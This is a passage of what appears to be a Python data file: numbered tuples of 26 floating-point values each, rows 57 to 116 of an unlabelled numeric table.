(4.144353753753753, 3.7136475308641974, 3.373432098765433, 3.638660416666667, 2.9981541559834577, 1.4583333333333335, 1.5273734204793028, 1.306555555555556, 1.5831633333333335, 0.7248690123456792, 0.5477058361391696, 0.3136798353909465, 0.0, 4.05, 3.4504781893004113, 2.7385291806958474, 2.1746070370370374, 3.166326666666667, 1.8291777777777782, 1.5273734204793028, 1.0416666666666667, 1.4990770779917288, 1.212886805555556, 0.6746864197530866, 0.33760432098765436, 0.0), # 57
(4.145373227886272, 3.69991739826246, 3.369591449474166, 3.6350957561728396, 2.99848826672938, 1.4583333333333335, 1.5221547405793594, 1.297914609053498, 1.5816078600823045, 0.7223150525834479, 0.5471646381510581, 0.3131677488187777, 0.0, 4.05, 3.444845237006554, 2.7358231907552906, 2.166945157750343, 3.163215720164609, 1.8170804526748974, 1.5221547405793594, 1.0416666666666667, 1.49924413336469, 1.2116985853909468, 0.6739182898948333, 0.33635612711476914, 0.0), # 58
(4.146292185767549, 3.6862295153177866, 3.365739826245999, 3.631495910493827, 2.9987891864572918, 1.4583333333333335, 1.5169577503429357, 1.289471193415638, 1.580043497942387, 0.7197849062642893, 0.5466151598287401, 0.3126541990550222, 0.0, 4.05, 3.439196189605243, 2.7330757991437, 2.1593547187928674, 3.160086995884774, 1.8052596707818933, 1.5169577503429357, 1.0416666666666667, 1.4993945932286459, 1.210498636831276, 0.6731479652492, 0.3351117741197988, 0.0), # 59
(4.147110309066831, 3.6726080246913586, 3.3618827160493825, 3.6278645833333334, 2.9990568662204096, 1.4583333333333335, 1.5117919389978214, 1.2812500000000002, 1.5784722222222225, 0.7172839506172841, 0.546057800224467, 0.3121399176954733, 0.0, 4.05, 3.4335390946502056, 2.7302890011223346, 2.151851851851852, 3.156944444444445, 1.7937500000000002, 1.5117919389978214, 1.0416666666666667, 1.4995284331102048, 1.2092881944444447, 0.6723765432098766, 0.33387345679012354, 0.0), # 60
(4.147827279453366, 3.6590770690443533, 3.3580256058527667, 3.624205478395062, 2.9992912570719494, 1.4583333333333335, 1.5066667957718067, 1.2732757201646092, 1.5768960082304526, 0.7148175628715137, 0.5454929583904894, 0.3116256363359245, 0.0, 4.05, 3.4278819996951686, 2.7274647919524466, 2.1444526886145407, 3.1537920164609052, 1.7825860082304528, 1.5066667957718067, 1.0416666666666667, 1.4996456285359747, 1.2080684927983543, 0.6716051211705534, 0.3326433699131231, 0.0), # 61
(4.148442778596402, 3.6456607910379515, 3.3541739826246006, 3.6205222993827166, 2.999492310065129, 1.4583333333333335, 1.5015918098926813, 1.2655730452674898, 1.5753168312757202, 0.7123911202560588, 0.5449210333790582, 0.31111208657216893, 0.0, 4.05, 3.4222329522938577, 2.7246051668952904, 2.137173360768176, 3.1506336625514404, 1.7718022633744859, 1.5015918098926813, 1.0416666666666667, 1.4997461550325646, 1.2068407664609058, 0.6708347965249202, 0.33142370827617745, 0.0), # 62
(4.148956488165184, 3.6323833333333333, 3.350333333333334, 3.6168187500000006, 2.9996599762531617, 1.4583333333333335, 1.4965764705882352, 1.2581666666666669, 1.5737366666666666, 0.7100100000000001, 0.5443424242424244, 0.31060000000000004, 0.0, 4.05, 3.4166, 2.721712121212122, 2.13003, 3.147473333333333, 1.7614333333333339, 1.4965764705882352, 1.0416666666666667, 1.4998299881265809, 1.2056062500000004, 0.6700666666666668, 0.3302166666666667, 0.0), # 63
(4.149368089828959, 3.6192688385916783, 3.346509144947417, 3.613098533950618, 2.999794206689266, 1.4583333333333335, 1.4916302670862585, 1.2510812757201648, 1.5721574897119341, 0.707679579332419, 0.5437575300328387, 0.31009010821521116, 0.0, 4.05, 3.4109911903673225, 2.7187876501641934, 2.1230387379972564, 3.1443149794238683, 1.7515137860082308, 1.4916302670862585, 1.0416666666666667, 1.499897103344633, 1.2043661779835395, 0.6693018289894834, 0.3290244398719708, 0.0), # 64
(4.149677265256975, 3.6063414494741655, 3.3427069044352997, 3.609365354938272, 2.999894952426658, 1.4583333333333335, 1.4867626886145406, 1.2443415637860082, 1.5705812757201647, 0.7054052354823961, 0.5431667498025524, 0.3095831428135955, 0.0, 4.05, 3.40541457094955, 2.715833749012762, 2.116215706447188, 3.1411625514403294, 1.7420781893004116, 1.4867626886145406, 1.0416666666666667, 1.499947476213329, 1.2031217849794242, 0.66854138088706, 0.32784922267946964, 0.0), # 65
(4.149883696118478, 3.593625308641976, 3.3389320987654325, 3.605622916666667, 2.9999621645185526, 1.4583333333333335, 1.4819832244008715, 1.2379722222222225, 1.56901, 0.7031923456790125, 0.542570482603816, 0.3090798353909466, 0.0, 4.05, 3.399878189300412, 2.7128524130190796, 2.1095770370370373, 3.13802, 1.7331611111111116, 1.4819832244008715, 1.0416666666666667, 1.4999810822592763, 1.2018743055555559, 0.6677864197530866, 0.3266932098765433, 0.0), # 66
(4.149987064082717, 3.581144558756287, 3.3351902149062647, 3.601874922839506, 2.999995794018168, 1.4583333333333335, 1.4773013636730412, 1.2319979423868317, 1.5674456378600823, 0.7010462871513491, 0.5419691274888808, 0.3085809175430575, 0.0, 4.05, 3.394390092973632, 2.7098456374444035, 2.103138861454047, 3.1348912757201646, 1.7247971193415643, 1.4773013636730412, 1.0416666666666667, 1.499997897009084, 1.2006249742798356, 0.6670380429812529, 0.3255585962505716, 0.0), # 67
(4.14991664579233, 3.5688578344174515, 3.331468649977138, 3.5980925221417075, 2.9999674547459585, 1.4583062693695066, 1.4727030389659292, 1.226390641670477, 1.5658783798201494, 0.6989620441647167, 0.5413523992360252, 0.3080843340633248, 0.0, 4.0499500600137175, 3.388927674696572, 2.7067619961801257, 2.09688613249415, 3.131756759640299, 1.716946898338668, 1.4727030389659292, 1.0416473352639333, 1.4999837273729792, 1.199364174047236, 0.6662937299954276, 0.3244416213106775, 0.0), # 68
(4.149256682769726, 3.5563900238948625, 3.3276628086419753, 3.594085054347826, 2.999709513435003, 1.4580923182441705, 1.4680536362693228, 1.2208497942386831, 1.5642397119341562, 0.6968806390704431, 0.5406575225943647, 0.3075739657786442, 0.0, 4.049554398148149, 3.3833136235650856, 2.7032876129718235, 2.090641917211329, 3.1284794238683125, 1.7091897119341564, 1.4680536362693228, 1.0414945130315503, 1.4998547567175016, 1.1980283514492756, 0.665532561728395, 0.3233081839904421, 0.0), # 69
(4.147954315023558, 3.5436839019425634, 3.3237561442615453, 3.589826137278583, 2.999199817101051, 1.4576709597114261, 1.463332026912274, 1.2153254077122393, 1.5625203856119496, 0.6947919524462736, 0.539876592435072, 0.307047425376427, 0.0, 4.048772933813444, 3.3775216791406963, 2.6993829621753602, 2.0843758573388205, 3.1250407712238992, 1.701455570797135, 1.463332026912274, 1.0411935426510186, 1.4995999085505256, 1.1966087124261946, 0.6647512288523091, 0.32215308199477855, 0.0), # 70
(4.146027864257172, 3.5307470618168946, 3.319750028577961, 3.585322051127214, 2.9984448210011028, 1.4570490219986791, 1.4585403319077976, 1.2098193110806281, 1.5607229614388052, 0.6926960359342641, 0.5390124913855908, 0.3065050979070905, 0.0, 4.047615955075446, 3.3715560769779955, 2.695062456927954, 2.0780881078027917, 3.1214459228776104, 1.6937470355128794, 1.4585403319077976, 1.040749301427628, 1.4992224105005514, 1.1951073503757383, 0.6639500057155922, 0.3209770056197177, 0.0), # 71
(4.143495652173914, 3.5175870967741933, 3.3156458333333334, 3.5805790760869565, 2.9974509803921565, 1.4562333333333337, 1.4536806722689075, 1.2043333333333335, 1.55885, 0.6905929411764707, 0.5380681020733654, 0.3059473684210527, 0.0, 4.04609375, 3.365421052631579, 2.6903405103668265, 2.071778823529412, 3.1177, 1.6860666666666668, 1.4536806722689075, 1.040166666666667, 1.4987254901960783, 1.1935263586956524, 0.6631291666666667, 0.31978064516129034, 0.0), # 72
(4.140376000477128, 3.5042116000707995, 3.3114449302697757, 3.575603492351047, 2.996224750531214, 1.4552307219427933, 1.4487551690086184, 1.1988693034598386, 1.556904061880811, 0.6884827198149495, 0.5370463071258393, 0.30537462196873066, 0.0, 4.04421660665295, 3.3591208416560367, 2.6852315356291965, 2.065448159444848, 3.113808123761622, 1.678417024843774, 1.4487551690086184, 1.0394505156734237, 1.498112375265607, 1.1918678307836825, 0.6622889860539553, 0.31856469091552725, 0.0), # 73
(4.136687230870161, 3.4906281649630513, 3.307148691129401, 3.570401580112721, 2.9947725866752735, 1.4540480160544635, 1.4437659431399446, 1.1934290504496268, 1.5548877076665142, 0.6863654234917563, 0.5359499891704572, 0.30478724360054227, 0.0, 4.041994813100138, 3.3526596796059644, 2.6797499458522855, 2.0590962704752687, 3.1097754153330284, 1.6708006706294773, 1.4437659431399446, 1.0386057257531882, 1.4973862933376367, 1.190133860037574, 0.6614297382258802, 0.31732983317845925, 0.0), # 74
(4.13244766505636, 3.4768443847072876, 3.302758487654321, 3.564979619565217, 2.9931009440813363, 1.452692043895748, 1.4387151156759002, 1.188014403292181, 1.5528034979423868, 0.6842411038489471, 0.5347820308346625, 0.30418561836690494, 0.0, 4.039438657407408, 3.3460418020359537, 2.673910154173312, 2.052723311546841, 3.1056069958847736, 1.6632201646090536, 1.4387151156759002, 1.0376371742112487, 1.4965504720406682, 1.1883265398550726, 0.6605516975308642, 0.3160767622461171, 0.0), # 75
(4.127675624739071, 3.462867852559848, 3.2982756915866487, 3.559343890901771, 2.9912162780064016, 1.4511696336940512, 1.4336048076294992, 1.1826271909769854, 1.5506539932937051, 0.682109812528578, 0.5335453147458995, 0.3035701313182361, 0.0, 4.036558427640603, 3.339271444500597, 2.6677265737294973, 2.046329437585734, 3.1013079865874102, 1.6556780673677796, 1.4336048076294992, 1.0365497383528937, 1.4956081390032008, 1.186447963633924, 0.6596551383173298, 0.31480616841453174, 0.0), # 76
(4.122389431621637, 3.4487061617770705, 3.2937016746684953, 3.55350067431562, 2.9891250437074692, 1.4494876136767771, 1.4284371400137559, 1.1772692424935225, 1.5484417543057463, 0.6799716011727052, 0.5322427235316126, 0.3029411675049536, 0.0, 4.03336441186557, 3.332352842554489, 2.6612136176580625, 2.039914803518115, 3.0968835086114925, 1.6481769394909316, 1.4284371400137559, 1.0353482954834123, 1.4945625218537346, 1.1845002247718734, 0.6587403349336991, 0.31351874197973373, 0.0), # 77
(4.1166074074074075, 3.4343669056152932, 3.2890378086419756, 3.54745625, 2.98683369644154, 1.4476528120713306, 1.423214233841685, 1.171942386831276, 1.5461693415637856, 0.6778265214233843, 0.5308771398192452, 0.30229911197747467, 0.0, 4.029866898148149, 3.3252902317522204, 2.654385699096226, 2.0334795642701526, 3.092338683127571, 1.6407193415637862, 1.423214233841685, 1.0340377229080933, 1.49341684822077, 1.182485416666667, 0.6578075617283952, 0.312215173237754, 0.0), # 78
(4.110347873799726, 3.4198576773308558, 3.2842854652492, 3.541216898148148, 2.9843486914656125, 1.445672057105116, 1.4179382101263003, 1.166648452979729, 1.5438393156531016, 0.6756746249226715, 0.5294514462362415, 0.30164434978621685, 0.0, 4.026076174554183, 3.318087847648385, 2.6472572311812077, 2.0270238747680143, 3.0876786313062032, 1.6333078341716205, 1.4179382101263003, 1.0326228979322258, 1.4921743457328063, 1.1804056327160497, 0.6568570930498401, 0.31089615248462327, 0.0), # 79
(4.103629152501939, 3.4051860701800964, 3.2794460162322814, 3.534788898953301, 2.9816764840366874, 1.4435521770055377, 1.4126111898806162, 1.1613892699283648, 1.5414542371589697, 0.6735159633126228, 0.527968525410046, 0.30097726598159785, 0.0, 4.02200252914952, 3.310749925797576, 2.6398426270502298, 2.020547889937868, 3.0829084743179394, 1.6259449778997108, 1.4126111898806162, 1.0311086978610984, 1.4908382420183437, 1.1782629663177673, 0.6558892032464564, 0.3095623700163725, 0.0), # 80
(4.096469565217392, 3.390359677419355, 3.2745208333333338, 3.5281785326086963, 2.9788235294117644, 1.4413000000000002, 1.4072352941176471, 1.1561666666666668, 1.5390166666666665, 0.6713505882352943, 0.5264312599681021, 0.3002982456140351, 0.0, 4.01765625, 3.303280701754386, 2.632156299840511, 2.0140517647058824, 3.078033333333333, 1.6186333333333336, 1.4072352941176471, 1.0295, 1.4894117647058822, 1.1760595108695657, 0.6549041666666667, 0.30821451612903233, 0.0), # 81
(4.088887433649431, 3.3753860923049697, 3.269511288294468, 3.5213920793075686, 2.975796282847844, 1.4389223543159075, 1.4018126438504073, 1.1509824721841184, 1.5365291647614692, 0.6691785513327417, 0.5248425325378543, 0.29960767373394626, 0.0, 4.013047625171469, 3.2956844110734083, 2.624212662689271, 2.0075356539982248, 3.0730583295229383, 1.6113754610577657, 1.4018126438504073, 1.0278016816542197, 1.487898141423922, 1.1737973597691898, 0.6539022576588936, 0.30685328111863364, 0.0), # 82
(4.080901079501402, 3.3602729080932785, 3.264418752857796, 3.514435819243156, 2.9726011996019257, 1.4364260681806638, 1.3963453600919107, 1.1458385154702029, 1.533994292028654, 0.6669999042470213, 0.5232052257467463, 0.29890593539174876, 0.0, 4.008186942729767, 3.287965289309236, 2.6160261287337314, 2.0009997127410637, 3.067988584057308, 1.604173921658284, 1.3963453600919107, 1.0260186201290455, 1.4863005998009629, 1.1714786064143856, 0.6528837505715593, 0.3054793552812072, 0.0), # 83
(4.072528824476651, 3.345027718040621, 3.259244598765432, 3.507316032608696, 2.969244734931009, 1.4338179698216735, 1.3908355638551717, 1.1407366255144034, 1.5314146090534977, 0.664814698620189, 0.5215222222222223, 0.2981934156378601, 0.0, 4.003084490740741, 3.280127572016461, 2.6076111111111113, 1.9944440958605667, 3.0628292181069954, 1.5970312757201646, 1.3908355638551717, 1.0241556927297668, 1.4846223674655046, 1.169105344202899, 0.6518489197530865, 0.3040934289127838, 0.0), # 84
(4.063788990278524, 3.3296581154033364, 3.253990197759488, 3.5000389995974235, 2.9657333440920954, 1.431104887466342, 1.385285376153205, 1.1356786313062037, 1.528792676421277, 0.6626229860943007, 0.5197964045917264, 0.29747049952269794, 0.0, 3.9977505572702334, 3.272175494749677, 2.5989820229586313, 1.9878689582829017, 3.057585352842554, 1.589950083828685, 1.385285376153205, 1.0222177767616727, 1.4828666720460477, 1.1666796665324748, 0.6507980395518976, 0.30269619230939426, 0.0), # 85
(4.054699898610365, 3.3141716934377627, 3.2486569215820764, 3.492611000402577, 2.9620734823421824, 1.4282936493420721, 1.3796969179990242, 1.1306663618350863, 1.5261310547172688, 0.6604248183114125, 0.5180306554827024, 0.29673757209667984, 0.0, 3.992195430384088, 3.2641132930634775, 2.5901532774135116, 1.9812744549342374, 3.0522621094345377, 1.5829329065691207, 1.3796969179990242, 1.0202097495300515, 1.4810367411710912, 1.1642036668008593, 0.6497313843164153, 0.3012883357670694, 0.0), # 86
(4.045279871175523, 3.298576045400239, 3.2432461419753085, 3.485038315217391, 2.9582716049382722, 1.4253910836762689, 1.3740723104056438, 1.1257016460905351, 1.5234323045267493, 0.6582202469135804, 0.5162278575225944, 0.29599501841022313, 0.0, 3.9864293981481485, 3.255945202512454, 2.581139287612972, 1.9746607407407408, 3.0468646090534985, 1.5759823045267491, 1.3740723104056438, 1.018136488340192, 1.4791358024691361, 1.1616794384057973, 0.6486492283950618, 0.29987054958183995, 0.0), # 87
(4.035547229677343, 3.2828787645471036, 3.2377592306812986, 3.477327224235105, 2.954334167137363, 1.4224040186963371, 1.3684136743860782, 1.1207863130620332, 1.5206989864349947, 0.6560093235428602, 0.5143908933388467, 0.29524322351374555, 0.0, 3.9804627486282587, 3.2476754586512007, 2.571954466694233, 1.9680279706285804, 3.0413979728699894, 1.5691008382868465, 1.3684136743860782, 1.0160028704973836, 1.4771670835686814, 1.1591090747450352, 0.6475518461362598, 0.29844352404973673, 0.0), # 88
(4.025520295819169, 3.267087444134696, 3.2321975594421586, 3.4694840076489535, 2.950267624196455, 1.4193392826296807, 1.3627231309533416, 1.1159221917390643, 1.5179336610272824, 0.6537920998413084, 0.512522645558903, 0.29448257245766457, 0.0, 3.9743057698902606, 3.2393082970343094, 2.5626132277945146, 1.9613762995239248, 3.035867322054565, 1.56229106843469, 1.3627231309533416, 1.0138137733069148, 1.4751338120982276, 1.156494669216318, 0.6464395118884317, 0.2970079494667906, 0.0), # 89
(4.015217391304348, 3.2512096774193546, 3.2265625000000004, 3.4615149456521745, 2.946078431372549, 1.4162037037037039, 1.3570028011204482, 1.1111111111111112, 1.515138888888889, 0.6515686274509805, 0.5106259968102075, 0.2937134502923977, 0.0, 3.9679687500000003, 3.230847953216374, 2.553129984051037, 1.9547058823529413, 3.030277777777778, 1.5555555555555556, 1.3570028011204482, 1.0115740740740742, 1.4730392156862746, 1.1538383152173917, 0.6453125000000001, 0.2955645161290323, 0.0), # 90
(4.004656837836225, 3.235253057657418, 3.2208554240969365, 3.4534263184380034, 2.9417730439226437, 1.413004110145811, 1.3512548059004124, 1.1063549001676574, 1.512317230605091, 0.6493389580139327, 0.5087038297202041, 0.2929362420683625, 0.0, 3.961461977023319, 3.222298662751987, 2.5435191486010202, 1.9480168740417978, 3.024634461210182, 1.5488968602347204, 1.3512548059004124, 1.0092886501041507, 1.4708865219613219, 1.1511421061460014, 0.6441710848193873, 0.2941139143324926, 0.0), # 91
(3.9938569571181493, 3.2192251781052263, 3.21507770347508, 3.445224406199678, 2.937357917103741, 1.4097473301834071, 1.3454812663062485, 1.1016553878981865, 1.5094712467611644, 0.6471031431722211, 0.506759026916337, 0.29215133283597666, 0.0, 3.954795739026063, 3.2136646611957427, 2.5337951345816845, 1.9413094295166629, 3.018942493522329, 1.5423175430574612, 1.3454812663062485, 1.0069623787024338, 1.4686789585518705, 1.148408135399893, 0.6430155406950161, 0.29265683437320245, 0.0), # 92
(3.982836070853462, 3.2031336320191164, 3.2092307098765436, 3.4369154891304357, 2.932839506172839, 1.4064401920438958, 1.3396843033509702, 1.0970144032921811, 1.506603497942387, 0.6448612345679013, 0.50479447102605, 0.29135910764565737, 0.0, 3.9479803240740736, 3.2049501841022305, 2.52397235513025, 1.9345837037037037, 3.013206995884774, 1.5358201646090537, 1.3396843033509702, 1.0046001371742113, 1.4664197530864196, 1.145638496376812, 0.6418461419753088, 0.29119396654719243, 0.0), # 93
(3.971612500745512, 3.1869860126554275, 3.203315815043439, 3.428505847423511, 2.9282242663869384, 1.403089523954682, 1.3338660380475922, 1.0924337753391253, 1.5037165447340346, 0.6426132838430298, 0.5028130446767874, 0.2905599515478225, 0.0, 3.9410260202331964, 3.196159467026047, 2.5140652233839367, 1.927839851529089, 3.007433089468069, 1.5294072854747756, 1.3338660380475922, 1.0022068028247728, 1.4641121331934692, 1.1428352824745038, 0.6406631630086879, 0.28972600115049346, 0.0), # 94
(3.960204568497644, 3.170789913270499, 3.1973343907178786, 3.420001761272142, 2.9235186530030397, 1.3997021541431696, 1.3280285914091288, 1.0879153330285019, 1.500812947721384, 0.6403593426396622, 0.5008176304959931, 0.28975424959288937, 0.0, 3.933943115569273, 3.187296745521783, 2.504088152479966, 1.9210780279189863, 3.001625895442768, 1.5230814662399026, 1.3280285914091288, 0.9997872529594067, 1.4617593265015199, 1.1400005870907142, 0.6394668781435758, 0.2882536284791363, 0.0), # 95
(3.948630595813205, 3.15455292712067, 3.1912878086419756, 3.4114095108695652, 2.9187291212781408, 1.3962849108367628, 1.3221740844485943, 1.0834609053497943, 1.497895267489712, 0.638099462599855, 0.4988111111111112, 0.2889423868312758, 0.0, 3.9267418981481486, 3.1783662551440335, 2.494055555555556, 1.9142983877995645, 2.995790534979424, 1.5168452674897122, 1.3221740844485943, 0.9973463648834019, 1.4593645606390704, 1.1371365036231886, 0.6382575617283952, 0.28677753882915186, 0.0), # 96
(3.936908904395539, 3.138282647462278, 3.185177440557842, 3.4027353764090176, 2.913862126469244, 1.3928446222628663, 1.3163046381790027, 1.0790723212924862, 1.4949660646242953, 0.6358336953656636, 0.4967963691495856, 0.288124748313399, 0.0, 3.919432656035666, 3.169372231447389, 2.4839818457479277, 1.9075010860969903, 2.9899321292485905, 1.5107012498094807, 1.3163046381790027, 0.9948890159020474, 1.456931063234622, 1.1342451254696728, 0.6370354881115684, 0.2852984224965707, 0.0), # 97
(3.925057815947994, 3.1219866675516617, 3.17900465820759, 3.3939856380837363, 2.908924123833347, 1.3893881166488853, 1.3104223736133687, 1.0747514098460602, 1.4920278997104097, 0.6335620925791443, 0.49477628723886047, 0.28730171908967667, 0.0, 3.9120256772976685, 3.1603189099864424, 2.4738814361943025, 1.9006862777374325, 2.9840557994208194, 1.5046519737844843, 1.3104223736133687, 0.9924200833206323, 1.4544620619166735, 1.1313285460279123, 0.6358009316415181, 0.2838169697774238, 0.0), # 98
(3.9130956521739133, 3.1056725806451615, 3.1727708333333338, 3.3851665760869567, 2.9039215686274513, 1.3859222222222223, 1.3045294117647062, 1.0705000000000002, 1.4890833333333333, 0.6312847058823531, 0.4927537480063797, 0.2864736842105264, 0.0, 3.9045312500000002, 3.1512105263157895, 2.4637687400318984, 1.893854117647059, 2.9781666666666666, 1.4987000000000004, 1.3045294117647062, 0.9899444444444444, 1.4519607843137257, 1.1283888586956525, 0.6345541666666669, 0.282333870967742, 0.0), # 99
(3.901040734776645, 3.0893479799991144, 3.1664773376771835, 3.3762844706119166, 2.8988609161085557, 1.382453767210283, 1.298627873646029, 1.0663199207437892, 1.4861349260783419, 0.629001586917346, 0.49073163407958736, 0.2856410287263656, 0.0, 3.896959662208505, 3.142051315990021, 2.4536581703979365, 1.8870047607520375, 2.9722698521566837, 1.492847889041305, 1.298627873646029, 0.9874669765787736, 1.4494304580542778, 1.125428156870639, 0.6332954675354368, 0.28084981636355594, 0.0), # 100
(3.888911385459534, 3.0730204588698617, 3.160125542981253, 3.367345601851852, 2.8937486215336614, 1.3789895798404714, 1.2927198802703526, 1.0622130010669104, 1.4831852385307118, 0.626712787326179, 0.48871282808592753, 0.2848041376876118, 0.0, 3.8893212019890258, 3.1328455145637295, 2.4435641404296375, 1.8801383619785366, 2.9663704770614236, 1.4870982014936747, 1.2927198802703526, 0.9849925570289081, 1.4468743107668307, 1.1224485339506176, 0.6320251085962507, 0.2793654962608966, 0.0), # 101
(3.8767259259259266, 3.05669761051374, 3.1537168209876545, 3.3583562500000004, 2.8885911401597673, 1.3755364883401924, 1.2868075526506901, 1.0581810699588479, 1.4802368312757201, 0.624418358750908, 0.48670021265284436, 0.28396339614468274, 0.0, 3.881626157407408, 3.12359735759151, 2.4335010632642216, 1.8732550762527236, 2.9604736625514403, 1.481453497942387, 1.2868075526506901, 0.9825260631001375, 1.4442955700798836, 1.1194520833333337, 0.630743364197531, 0.27788160095579456, 0.0), # 102
(3.864502677879168, 3.040387028187088, 3.1472525434385004, 3.349322695249598, 2.883394927243874, 1.3721013209368493, 1.280893011800056, 1.0542259564090841, 1.4772922648986433, 0.6221183528335891, 0.48469667040778164, 0.2831191891479958, 0.0, 3.873884816529492, 3.114311080627953, 2.4234833520389083, 1.8663550585007669, 2.9545845297972866, 1.475916338972718, 1.280893011800056, 0.9800723720977494, 1.441697463621937, 1.1164408984165328, 0.6294505086877001, 0.2763988207442808, 0.0), # 103
(3.852259963022604, 3.0240963051462453, 3.140734082075903, 3.340251217793881, 2.878166438042981, 1.3686909058578471, 1.2749783787314652, 1.0503494894071028, 1.4743540999847584, 0.6198128212162782, 0.48270508397818346, 0.2822719017479685, 0.0, 3.8661074674211253, 3.104990919227653, 2.413525419890917, 1.8594384636488344, 2.948708199969517, 1.4704892851699438, 1.2749783787314652, 0.9776363613270336, 1.4390832190214904, 1.1134170725979606, 0.6281468164151807, 0.274917845922386, 0.0), # 104
(3.840016103059581, 3.0078330346475504, 3.1341628086419755, 3.3311480978260866, 2.8729121278140886, 1.3653120713305902, 1.2690657744579317, 1.0465534979423872, 1.4714248971193415, 0.6175018155410315, 0.480728335991494, 0.2814219189950185, 0.0, 3.858304398148148, 3.0956411089452027, 2.40364167995747, 1.852505446623094, 2.942849794238683, 1.465174897119342, 1.2690657744579317, 0.9752229080932786, 1.4364560639070443, 1.1103826992753625, 0.6268325617283951, 0.273439366786141, 0.0), # 105
(3.8277894196934454, 2.9916048099473427, 3.1275400948788294, 3.3220196155394524, 2.867638451814196, 1.3619716455824824, 1.263157319992469, 1.0428398110044201, 1.4685072168876694, 0.6151853874499046, 0.4787693090751571, 0.2805696259395632, 0.0, 3.850485896776406, 3.0862658853351945, 2.3938465453757853, 1.8455561623497134, 2.9370144337753388, 1.4599757354061882, 1.263157319992469, 0.9728368897017731, 1.433819225907098, 1.1073398718464844, 0.6255080189757659, 0.27196407363157665, 0.0), # 106
(3.8155982346275423, 2.9754192243019606, 3.1208673125285786, 3.312872051127214, 2.8623518653003037, 1.3586764568409289, 1.2572551363480924, 1.0392102575826858, 1.465603619875019, 0.612863588584954, 0.47683088585661687, 0.2797154076320202, 0.0, 3.842662251371742, 3.0768694839522217, 2.3841544292830843, 1.8385907657548617, 2.931207239750038, 1.4548943606157603, 1.2572551363480924, 0.9704831834578064, 1.4311759326501519, 1.1042906837090716, 0.6241734625057157, 0.2704926567547237, 0.0), # 107
(3.8034608695652175, 2.9592838709677425, 3.114145833333334, 3.303711684782609, 2.857058823529411, 1.3554333333333337, 1.2513613445378151, 1.0356666666666667, 1.4627166666666667, 0.6105364705882355, 0.47491594896331746, 0.2788596491228071, 0.0, 3.8348437500000006, 3.0674561403508775, 2.374579744816587, 1.8316094117647062, 2.9254333333333333, 1.4499333333333335, 1.2513613445378151, 0.9681666666666668, 1.4285294117647056, 1.10123722826087, 0.6228291666666669, 0.269025806451613, 0.0), # 108
(3.7913956462098173, 2.9432063432010267, 3.1073770290352085, 3.2945447966988723, 2.85176578175852, 1.3522491032871007, 1.2454780655746525, 1.032210867245847, 1.4598489178478888, 0.6082040851018049, 0.4730273810227027, 0.2780027354623413, 0.0, 3.8270406807270234, 3.0580300900857535, 2.3651369051135136, 1.8246122553054143, 2.9196978356957777, 1.4450952141441857, 1.2454780655746525, 0.9658922166336433, 1.42588289087926, 1.0981815988996244, 0.6214754058070417, 0.2675642130182752, 0.0), # 109
(3.7794208862646865, 2.9271942342581534, 3.1005622713763157, 3.285377667069243, 2.846479195244628, 1.3491305949296348, 1.2396074204716179, 1.0288446883097089, 1.4570029340039627, 0.6058664837677185, 0.4711680646622168, 0.2771450517010405, 0.0, 3.819263331618656, 3.0485955687114448, 2.355840323311084, 1.817599451303155, 2.9140058680079255, 1.4403825636335925, 1.2396074204716179, 0.9636647106640249, 1.423239597622314, 1.0951258890230813, 0.6201124542752632, 0.2661085667507413, 0.0), # 110
(3.7675549114331726, 2.91125513739546, 3.093702932098766, 3.2762165760869566, 2.841205519244735, 1.3460846364883403, 1.2337515302417263, 1.0255699588477367, 1.4541812757201646, 0.6035237182280321, 0.4693408825093036, 0.27628698288932213, 0.0, 3.811521990740741, 3.039156811782543, 2.346704412546518, 1.810571154684096, 2.9083625514403293, 1.4357979423868314, 1.2337515302417263, 0.9614890260631003, 1.4206027596223676, 1.0920721920289858, 0.6187405864197533, 0.26465955794504187, 0.0), # 111
(3.75581604341862, 2.895396645869286, 3.086800382944674, 3.26706780394525, 2.8359512090158425, 1.3431180561906215, 1.2279125158979918, 1.0223885078494133, 1.4513865035817708, 0.6011758401248017, 0.46754871719140734, 0.2754289140776037, 0.0, 3.803826946159122, 3.0297180548536407, 2.337743585957037, 1.8035275203744048, 2.9027730071635416, 1.4313439109891786, 1.2279125158979918, 0.9593700401361582, 1.4179756045079213, 1.0890226013150834, 0.6173600765889348, 0.2632178768972078, 0.0), # 112
(3.744201689481218, 2.8796528268881825, 3.0798726094173565, 3.257950164747612, 2.830713514712988, 1.3402362794833866, 1.222105192731354, 1.0193087614634344, 1.4486283748344828, 0.5988304736612731, 0.4657949270768578, 0.274573097883481, 0.0, 3.7961775603372887, 3.0203040767182903, 2.328974635384289, 1.796491420983819, 2.8972567496689656, 1.4270322660488082, 1.222105192731354, 0.957311628202419, 1.415356757356494, 1.0859833882492043, 0.6159745218834713, 0.26178662062619845, 0.0), # 113
(3.732592359160026, 2.8641789672926965, 3.0730152250072065, 3.2489368263832006, 2.8254382278843537, 1.3374327419903105, 1.216403641682116, 1.0163685432508534, 1.4459492047617415, 0.5965315167912784, 0.46408295580754655, 0.2737304057370992, 0.0, 3.788510165664014, 3.0110344631080905, 2.3204147790377325, 1.7895945503738346, 2.891898409523483, 1.4229159605511947, 1.216403641682116, 0.9553091014216503, 1.4127191139421769, 1.0829789421277338, 0.6146030450014414, 0.2603799061175179, 0.0), # 114
(3.720953961201598, 2.848980639517117, 3.066232310902439, 3.240025351554534, 2.820108714103627, 1.3347001529163784, 1.2108119300383124, 1.0135671090464515, 1.4433499971558386, 0.5942825327988078, 0.46241030076180634, 0.27290125275196175, 0.0, 3.7808026526641507, 3.001913780271579, 2.3120515038090312, 1.7828475983964231, 2.886699994311677, 1.4189939526650321, 1.2108119300383124, 0.9533572520831274, 1.4100543570518136, 1.0800084505181782, 0.613246462180488, 0.2589982399561016, 0.0), # 115
(3.709271949295054, 2.8340357031402905, 3.0595107299946247, 3.231199845079921, 2.8147169403690073, 1.3320320713669895, 1.2053209635055788, 1.010896718816499, 1.4408241785637108, 0.5920793358449549, 0.4607737287514322, 0.27208410658291154, 0.0, 3.7730429039023563, 2.9929251724120265, 2.3038686437571605, 1.7762380075348643, 2.8816483571274216, 1.4152554063430987, 1.2053209635055788, 0.9514514795478496, 1.4073584701845037, 1.0770666150266406, 0.611902145998925, 0.25763960937639013, 0.0), # 116
